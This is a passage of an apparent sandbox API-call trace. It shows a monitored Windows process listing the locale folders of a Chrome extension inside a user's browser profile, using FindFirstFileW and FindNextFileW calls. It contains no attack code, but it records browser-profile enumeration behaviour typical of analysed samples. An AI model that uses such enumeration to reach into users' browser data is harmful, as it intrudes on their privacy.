ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.827] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar", cAlternateFileName="")) returned 1 [0207.827] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0207.827] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en_GB", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0207.828] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859aa710, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859aa710, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es_419", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0207.829] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0207.830] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ms", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0207.831] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0207.832] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0207.833] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0207.833] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0207.833] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0207.833] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0207.833] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0207.834] FindNextFileW (in: hFindFile=0xb7f0d0, lpFindFileData=0x949e7d4 | out: lpFindFileData=0x949e7d4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0207.834] FindClose (in: hFindFile=0xb7f0d0 | out: hFindFile=0xb7f0d0) returned 1 [0207.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea5c) returned 1 [0207.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea68) returned 1 [0207.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea9c) returned 1 [0207.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", nBufferLength=0x105, lpBuffer=0x949e5a4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpFilePart=0x0) returned 0x86 [0207.835] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", nBufferLength=0x105, lpBuffer=0x949e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpFilePart=0x0) returned 0x87 [0207.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x949e7c4 | out: lpFindFileData=0x949e7c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f0d0 [0207.836] 